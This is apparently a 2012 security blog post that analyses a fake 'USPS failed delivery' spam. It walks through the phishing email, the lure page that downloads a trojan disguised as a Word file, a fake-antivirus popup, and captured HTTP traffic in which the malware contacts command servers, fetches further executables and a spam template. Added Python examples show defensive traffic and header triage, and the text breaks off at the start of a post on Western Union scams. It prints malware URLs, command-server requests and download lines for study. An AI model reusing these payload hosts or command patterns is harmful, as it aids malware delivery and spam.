Thursday, August 30, 2012

No, USPS Did Not Fail to Deliver a Package This Week

Started receiving alerts claiming to be from the USPS concerning a package that could not be delivered.

This is a new take on an old trick, and a 'low-budget' one at that. Whatever the case, this email is also very much malicious. My fully patched Windows 7 sandbox was quickly popped by the bug without any effort. It also did not seem to matter that the user ID had only limited user privileges; I received no UAC approval window when it was triggered. Very disturbing.

There's no visible text in the email when displayed as HTML. But there is hidden text in the background that is probably intended to make the message appear legitimate to spam filters. The text itself appears to be pulled from 3 novels which have long since found their way into the public domain:

From "Artemus Ward (his travels) among the Mormons, Part 1" by John Camden Hotten (originally published in 1865)
. . .Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. . .

From "A Fleece of Gold: Five Lessons from the Fable of Jason and Golden Fleece" by Charles Steward Given (originally published in 1905)
. . .Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. . .

From "The Entire PG Works by George Meredith, Volume 1 of 10" by George Meredith (originally published in 1851)
. . .Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. . .

I wonder how the original email author came upon these three distinctly different novels, since even in an internet-connected world it seems unlikely that they are just the result of a "What novels should I quote to bypass spam filters?" Google search.

That said, the user only sees a low-quality JPG image (pulled from http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg) when they open the message, claiming that USPS failed to deliver a package. . .
USPS.COM
Unfortunately, we failed to deliver the postal package you have sent on the 27th of august in time, because the recipient's address is erroneous.

Please go to the nearest UPS office and show your shipping label.

If the parcel isn't received within 30 working days our company will have the right claim compensation from you for each day of keeping.
Low quality JPG referring to a phantom parcel

Not sure why I would be taking a USPS/United States Postal Service receipt to a UPS/United Parcel Service office, but whatever.

Clicking on the image sends the user to http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm, which contains only a very simple piece of JavaScript that commands the browser to download a file named Label_Copy_USPS [DOT] zip. . .
Javascript to download the Label_Copy_USPS file

The zip file itself contains a malicious file named Label_Copy_USPS [DOT] exe, with an embedded icon that makes it look like an MS Word document to the untrained eye.
Not really a word document, no matter what it says
Unique File Details:
Filename -- Label_Copy_USPS [DOT] exe
File size -- 88576 bytes (86.5 KB)
Filetype -- PE32 executable for MS Windows (GUI) Intel 80386 32-bit (Win32 Executable Generic)
MD5 Hash -- 7c35f845a49f95e6797ee89073cf1d89
SHA1 Hash -- 8dc099b23270b70a42dad714a230c4b51eb06175
SHA256 Hash -- 254dd09af71c45cbad147aa523cf7f277340c1e0799fba9b36f20942f295c63d
Online malware scanners identified the file as:
AntiVir -- TR/Crypt.ZPACK.Gen
Avira -- TR/Crypt.ZPACK.Gen
Eset -- Win32/Kryptik.ALDT (Variant)
F-Prot -- W32/Falab.J6.gen!Eldorado
Kaspersky Lab -- Trojan-Downloader.Win32.Kuluoz.ar
McAfee -- Generic BackDoor.adp
Norman -- W32/Obfuscated.D!genr
Sophos -- Mal/EncPk-AGK

The file also appears to have authentic metadata, though it could just as easily be another misdirection.
File Description: Fatal Hums 32
Company: EPoX
File Version: 2.2.0.1112
Date Created: 8/30/2012 6:57 AM
Size: 86.5 KB

Opened the file in the sandbox and confirmed its malicious nature.

It appears to execute, but doesn't display anything but an empty document in notepad named "Label_Copy_USPS". Not sure if that's just for appearance, or if it's exploiting something in notepad on my fully patched sandbox machine.
Just an empty notepad document

The Label_Copy_USPS.exe file with the MSWord icon has also been replaced with an empty text file named Label_Copy_USPS.txt.

After that, nothing else. At least for a few minutes.

Then I get a popup for something called Security Monitor claiming:
Security Monitor: WARNING!

Attention! System detected a potential hazard (TrojanSPM/LX) on your computer
that may infect executable files. Your private information and PC Safety
is at risk.
To get rid of unwanted spyware and keep your computer safe you need to update your computer security software.
Click Yes to download official intrusion detection system (IDS software)
Bogus Security Monitor Warning

Followed by an ominous system tray flag. . .
WARNING!
Application cannot be executed. The file notepad.exe is infected.

Please activate your antivirus software.
Bogus Infected File Flag

And then conveniently a scan from Live Security Platinum (one of the Fake Antivirus variants) which I of course didn't knowingly install. . .
Live Security Platinum (one of the Fake Antivirus variants)

I've seen these before, and it always amuses me how it claims certain applications are infected on the machine (even though they are not actually installed).

But whatever the case, it throws the expected "Your machine is infected with many malicious bugs, It is highly recommended that you remove all the threats from your computer immediately" message.
Bogus Infected Machine Warning

And of course clicking on the button takes the user to a website asking for a credit card number.

Basically anything that I did on the machine from this point on triggered an alert claiming that whatever application I was trying to open was infected, right after the process was terminated for my 'safety'.

But that's not all that's going on. . .

Behind the scenes, this all starts with an HTTP connection on TCP port 84 to a Netherlands IP (93.184.100.116), which pulls down another malicious exe file named 3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe

GET //get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: 93.184.100.116:84
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Thu, 30 Aug 2012 20:30:04 GMT
ETag: "ddc0f1-66a00-4c8818a54eb00"
Accept-Ranges: bytes
Content-Length: 420352

MZ......................@...............................................!..L.!This program cannot be run in DOS mode. [FILE CONTINUES]

And then it pulls yet another malicious file, passF [DOT] dll [DOT] crp. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passF

GET //get/passF.dll.crp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Fri, 24 Aug 2012 12:47:50 GMT
ETag: "ddc0f8-1a9e00-4c80262356980"
Accept-Ranges: bytes
Content-Length: 1744384

>...p_..w_......._..s_..3_..s_..s_..s_..s_..s_..s_..s_..s_..{^..}@..s...R..L.~Th., p.0gr.2 c.1no..beS-unS6n 7.S .0de]R

W_..s_..+...oO..oO..[FILE CONTINUES]

And because that clearly wasn't enough, it connects to Hong Kong (175.41.28.156) to log itself as 'installed'. . .
GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent:
Host: 175.41.28.156

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 30 Aug 2012 20:56:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive

Then the bug silently submits a form to a server in Kazakhstan (195.210.47.109) and downloads a spam email template. . .
POST /index.php HTTP/1.1
Host: 195.210.47.109:80:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
0549571111555245

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
13849612

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Aug 2012 20:56:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
f4a

HTTP/1.1 200 OK
Date: Thu, 30 Aug 2012 20:56:29 GMT
Server: Apache/2.2.16
Content-Length: 55876
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%+./".,****...)/.'4hr.%.'ywtxp%.'m%.***.'4m%.'h%**/5)+)5)/,5*#)!#/.*,(5)(+5*(*5*-#!#/.*,(5##5.5(!#+.*##5*(#5".5*((!#/.)+(5*(+5*)"5.#!#/.)+"5)+5,#5)/*!#/.-#5*,(5*#)5*)#!#/.,)5..[FILE CONTINUES]

Once downloaded, the sandbox becomes a mail zombie and starts blasting the world. . .

Meanwhile. . . the bug is also trying to pull down more badness from Germany (78.159.108.83). . .
GET /ajax/libs/jquery/1.6.4/jquery [DOT] min [DOT] js HTTP/1.1
Accept: */*
Referer: http://chechoutbiz [DOT] com/p/liv/?group=liv&ver=3060001&reject_url=http%3A%2F%2Fchechoutbiz [DOT] com%3A80%2Fp%2Fdecline%2F%3Fgroup%3Dliv%26ver%3D3060001%26nid%3DD0F7718D%26affid%3D41100&nid=D0F7718D&affid=41100
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Connection: Keep-Alive

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 30 Aug 2012 18:41:47 GMT
Expires: Fri, 30 Aug 2013 18:41:47 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8101

............y..../....MD...j..v.%`C...-..K..aS.....H.Zr......SU(......}...(.j=u.:K.i.l...|....U.?{..M..M...........C.p.-..2.W...i.....U./.+?VIpo...[?.....v.:....O.*[.Q.0...j...?l.(..<[FILE CONTINUES]

And then yet another file from Missouri (209.20.78.241) via TCP port 84. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37280D51B2FB5E0240E44F8B14D849155C63ADBC2A2CA31 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 209.20.78.241:84

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 30 Aug 2012 21:03:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 225

..9.......Q0.r+..W..As..yP........k....mEq.v..j!...fg.@.o?.Y....|.4rh.....5^.....{.j..q.SK.q.....U..........'2.e9..IrKJe.,zSo/..o.a8_.cf.......~(MD.+.P.........f...?......M..^{Q.|.f...@.;.%Y.(.K..8PF..S..\l.%..W..v.&8a.KR....

And then back to Germany (slopokan21 [DOT] ru) to fill out another online form. . .
POST /index [DOT] php HTTP/1.1
Host: slopokan21 [DOT] ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 2936

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
2505323811778201

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
14097139

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#29

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="smtx"
CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.0 303 See Other
Location: http://slopokan21 [DOT] ru:80/index [DOT] php
Content-Length: 0
Connection: close
Date: Thu, 30 Aug 2012 21:00:40 GMT

The connections and downloads continue with zero sign of stopping. And again, all of this is taking place silently behind the scenes without the user ever knowing.
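The captures above share a handful of traits a defender can key on: HTTP on TCP port 84, a User-Agent claiming a Windows NT version that does not exist, command strings returned with a text/html label, PE files in responses, and the spam bot's fixed multipart check-in fields. The block below is an added example, not code from the original post, that turns those traits into triage rules; SESSIONS is a constructed transcription of three of the exchanges shown here (long paths and bodies trimmed) and the rule names are mine.

```python
"""Rule-based triage of the HTTP exchanges captured above (added example).

SESSIONS is a constructed transcription of three of the captures in this post,
with long paths and bodies trimmed; the rule names are my own, not the post's.
"""
import re
from urllib.parse import parse_qsl

# Windows NT versions a real 2012 browser could report (6.2 = Windows 8).
# The downloader's "Windows NT 9.0" never existed, which makes it a cheap signature.
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2"}
COMMON_HTTP_PORTS = {80, 443, 8080}
SPAMBOT_FIELDS = {"sid", "guid", "wv", "ping"}   # fixed fields of the bot's check-in form

def multipart(boundary, fields):
    """Build a multipart/form-data body shaped like the spam bot's check-in (constructed)."""
    parts = [f'--{boundary}\nContent-Disposition: form-data; name="{k}"\n\n{v}\n'
             for k, v in fields.items()]
    return "".join(parts) + f"--{boundary}--\n"

SESSIONS = [
    {   # C2 check-in on TCP 84: a text/html response that is really a command string
        "request": "GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4 HTTP/1.1",
        "req_headers": {"User-Agent": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
                        "Host": "93.184.100.116:84"},
        "resp_headers": {"Server": "nginx/0.8.55", "Content-Type": "text/html"},
        "resp_body": "c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passF",
    },
    {   # the follow-up fetch: a PE file served from the same host and port
        "request": "GET //get/3b0c6a8305cc89cf77f3c9616a569e78.exe HTTP/1.1",
        "req_headers": {"User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)",
                        "Host": "93.184.100.116:84"},
        "resp_headers": {"Content-Type": "application/x-msdos-program"},
        "resp_body": "MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00",
    },
    {   # spam-bot check-in: multipart POST carrying the bot's sid/guid/wv/ping fields
        "request": "POST /index.php HTTP/1.1",
        "req_headers": {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1)",
                        "Host": "195.210.47.109:80:80",
                        "Content-Type": "multipart/form-data; boundary=1BEF0A57BE110FD467A"},
        "req_body": multipart("1BEF0A57BE110FD467A", {
            "sid": "0549571111555245", "ping": "457",
            "guid": "{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}", "wv": "6#2#1#0#7601#0"}),
        "resp_headers": {"Content-Type": "text/html"},
        "resp_body": "",
    },
]

def check_user_agent(ua):
    """Return why the User-Agent is implausible, or None if it looks normal."""
    if not ua.strip():
        return "empty User-Agent"           # the install beacon above sends exactly this
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    if m and m.group(1) not in KNOWN_NT_VERSIONS:
        return f"nonexistent Windows NT {m.group(1)}"
    return None

def parse_c2_command(content_type, body):
    """Recognise the 'c=<cmd>&u=<path>...' strings the C2 returns labelled as text/html."""
    if not content_type.startswith("text/html") or not re.match(r"c=\w+&u=", body):
        return None
    return dict(parse_qsl(body))

def parse_multipart_fields(content_type, body):
    """Minimal multipart/form-data field extractor, enough for the check-in form."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return {}
    fields = {}
    for part in body.split("--" + m.group(1)):
        f = re.search(r'name="([^"]+)".*?\r?\n\r?\n(.*?)\r?\n', part, re.S)
        if f:
            fields[f.group(1)] = f.group(2).strip()
    return fields

def triage(sessions):
    """Run every rule over every session; returns (session index, rule, detail) tuples."""
    findings = []
    for i, s in enumerate(sessions):
        method, path, _ = s["request"].split(" ", 2)
        reqh, resph, body = s["req_headers"], s["resp_headers"], s["resp_body"]
        reason = check_user_agent(reqh.get("User-Agent", ""))
        if reason:
            findings.append((i, "bogus_user_agent", reason))
        _, _, port = reqh.get("Host", "").partition(":")
        if port and not port.isdigit():             # e.g. the bot's "host:80:80"
            findings.append((i, "malformed_host", reqh["Host"]))
        elif port and int(port) not in COMMON_HTTP_PORTS:
            findings.append((i, "nonstandard_port", f"HTTP on port {port}"))
        cmd = parse_c2_command(resph.get("Content-Type", ""), body)
        if cmd:
            findings.append((i, "c2_command", f"{cmd.get('c')} {cmd.get('u')}"))
        if body.startswith("MZ"):                   # DOS/PE header in the response
            findings.append((i, "pe_download", path))
        if method == "POST":
            fields = parse_multipart_fields(reqh.get("Content-Type", ""), s.get("req_body", ""))
            if SPAMBOT_FIELDS <= set(fields):
                findings.append((i, "spambot_checkin", f"guid={fields['guid']} wv={fields['wv']}"))
    return findings
```

Running `triage(SESSIONS)` yields seven findings across the three sessions; a real deployment would feed proxy or pcap exports into the same function.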

Good times


Original source email (minus the HTML formatting):
Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Return-Path:
Received: from mailforward. (mailforward.. [10.10.10.23])
by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) client-ip=10.10.10.23;
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) smtp.mail=www@suzan.yourwebhost [DOT] com
Received: from mx1. (inbound-us1. [70.87.28.133])
by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost [DOT] com (suzan [DOT] yourwebhost [DOT] com [209.239.43.1])
by mx1. (Postfix) with ESMTP id 58343471681
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
by suzan.yourwebhost [DOT] com (8.14.3/8.12.10) id q7UGq3Uc015428;
Thu, 30 Aug 2012 12:52:03 -0400
Date: Thu, 30 Aug 2012 12:52:03 -0400
Message-Id: <201208301652.q7UGq3Uc015428@suzan.yourwebhost [DOT] com>
To: christoperj
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
Reply-To: "USPS Customer Service"
Mime-Version: 1.0
Content-Type:multipart/mixed;boundary="----------1346345523503F9A33361C5"
X-CTCH-Spam: Suspect
X-CTCH-VOD: Unknown
X-CTCH-RefID: str=0001.0A0B0209.503F9A39.0103,ss=2,re=0.000,recu=0.000,reip=0.000,cl=2,cld=1,fgs=0



------------1346345523503F9A33361C5


[LINK TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm USING IMAGE FILE POINTING TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg]

There are no ravishingly beautiful women present, and no positively ugly ones.The men are fair to middling. They will never be slain in cold blood for their beauty, nor shut up in jail for their homeliness. There are some good voices in the choir to-day, but the orchestral accompaniment is unusually slight. Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. Therefore trombones are tooted on Sundays in Utah as well as on other days; and there are some splendid musicians there. The Orchestra in Brigham Youngs theatre is quite equal to any in Broadway. There is a youth in Salt Lake City (I forget his name) who plays the cornet like a North American angel. Mr. Stenhouse relieves me of any anxiety I had felt in regard to having my swan-like throat cut by the Danites, but thinks my wholesale denunciation of a people I had never seen was rather hasty.


And the plaudits of men and of angels attend the young man today who has a worthy object in view, who believes in himself, and bends to the oars with might and main.An active hand symbolizes usefulness and thrift. Has it ever occurred to you what a wonderful piece of mechanism is that hand with which Nature has equipped you for seizing the oars of lifes activities? Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. Scientists regard the human hand as being the most remarkable organ, not vital, in the whole animal kingdom. It is conceded to be, also, the most pronounced physical characteristic differentiating man from the lower animals. The chimpanzee and the gorilla, closely allied to the human species in many respects, are noticeably deficient in the use of their modified hands; being able to grasp things only in a cumbersome way.

Tongue out of mouth trotted the little dog after him; crouched panting when he stopped an instant; rose weariedly when he started afresh.Now and then a large white night-moth flitted through the dusk of the forest. On a barren corner of the wooded highland looking inland stood grey topless ruins set in nettles and rank grass-blades. Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. He sat and eyed them, thinking not at all. His energies were expended in action. He sat as a part of the ruins, and the moon turned his shadow Westward from the South. Overhead, as she declined, long ripples of silver cloud were imperceptibly stealing toward her. They were the van of a tempest. He did not observe them or the leaves beginning to chatter.




------------1346345523503F9A33361C5--
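Walking the Received chain by hand is what the pasted headers invite; the added example below (not code from the original post) does it programmatically: it orders the hops, finds where the message entered the mail system, measures transit time, and compares the brand in the From display name with the domain the receiver's SPF check actually evaluated. The headers are transcribed from the message above with the stripped addresses left empty and the [DOT] defanging undone; the check names are mine.

```python
"""Header-chain triage for the source email pasted above (added example).

RAW_HEADERS transcribes that email's headers as the post shows them (addresses
the post stripped stay empty, the [DOT] defanging is undone); the checks and
their names are my own, not anything from the original post.
"""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

RAW_HEADERS = """\
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
        Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
        Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: from mailforward. (mailforward.. [10.10.10.23])
        by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
        Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor
        denied by best guess record for domain of www@suzan.yourwebhost.com)
        smtp.mail=www@suzan.yourwebhost.com
Received: from mx1. (inbound-us1. [70.87.28.133])
        by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
        for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost.com (suzan.yourwebhost.com [209.239.43.1])
        by mx1. (Postfix) with ESMTP id 58343471681
        for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
        by suzan.yourwebhost.com (8.14.3/8.12.10) id q7UGq3Uc015428;
        Thu, 30 Aug 2012 12:52:03 -0400
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
X-CTCH-Spam: Suspect

"""

# "from <host> ... by <host>"; the origin hop uses sendmail's "(from user@localhost)" form
HOP_RE = re.compile(r"(?:\(?from\s+(?P<src>[^\s;)]+))?.*?\bby\s+(?P<by>[^\s;]+)", re.S)

def _hop_time(value):
    """Timestamp after the last ';' of a Received header, or None when unparsable."""
    try:
        return parsedate_to_datetime(value.rsplit(";", 1)[-1].strip())
    except (TypeError, ValueError):
        return None

def received_hops(msg):
    """The Received chain in transit order (oldest hop first), one dict per hop."""
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())                   # unfold the header
        m = HOP_RE.search(value)
        hops.append({"from": (m.group("src") or "") if m else "",
                     "by": m.group("by") if m else "",
                     "time": _hop_time(value)})
    return hops

def origin_hop(hops):
    """First hop that names a source: where the message entered the mail system."""
    return next((h for h in hops if h["from"]), None)

def transit_seconds(hops):
    """Seconds between the earliest and latest timestamped hop."""
    times = [h["time"] for h in hops if h["time"] is not None]
    return int((times[-1] - times[0]).total_seconds()) if len(times) > 1 else 0

def authenticated_sender_domain(msg):
    """Domain the receiver's SPF check evaluated (Authentication-Results smtp.mail=)."""
    unfolded = " ".join(msg.get("Authentication-Results", "").split())
    m = re.search(r"smtp\.mail=\S+@([\w.-]+)", unfolded)
    return m.group(1).lower() if m else None

def brand_mismatch(msg, brand_domains):
    """(brand, real domain) when the From display name drops a brand whose domains
    do not include the SPF-evaluated sender domain; None otherwise."""
    display, actual = msg.get("From", "").lower(), authenticated_sender_domain(msg)
    for brand, domains in brand_domains.items():
        if brand.lower() in display and actual and not any(
                actual == d or actual.endswith("." + d) for d in domains):
            return brand, actual
    return None

def triage(raw):
    """Summarise one message: hop count, origin, transit time, brand mismatch, mailer."""
    msg = message_from_string(raw)
    hops = received_hops(msg)
    origin = origin_hop(hops)
    return {"hops": len(hops),
            "origin": f"{origin['from']} -> {origin['by']}" if origin else None,
            "transit_seconds": transit_seconds(hops),
            "brand_mismatch": brand_mismatch(msg, {"USPS": ["usps.com", "usps.gov"]}),
            "mailer": msg.get("X-Mailer")}
```

For this message the origin hop is `www@localhost -> suzan.yourwebhost.com`, i.e. the mail was injected locally by the web-server user on a shared host, which fits the X-Mailer and the SPF identity rather than anything USPS owns.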

No, I Do Not Have a Confirmed Money Transfer from Western Union

Received a new version (well, received it several times, actually) of the old Western Union Money Transfer scam in the last 48 hours.

This latest derivative comes across as an authentic looking email from "2012, Western Union" thanking me (or more specifically, a random name that isn't actually me) for using the Western Union Money Transfer service. The email goes on to say that a credit of several hundred dollars is ready for me to pick up. All I have to do is to click on a link for the transaction details.

And as a bonus -- I have also earned Western Union Gold Points for the transaction. I like bonuses. I wonder if I can convert them to airline miles?

Regardless -- like all the versions that came before, this latest incarnation is clearly fake and appears to have been sent with malicious intent.

All of the emails appear to be an attempt to trick the reader into clicking on a variety of non-Western Union links peppered throughout the messages.

None of the links I found in the messages I received were working when I tested them.

These links threw an immediate 404 --
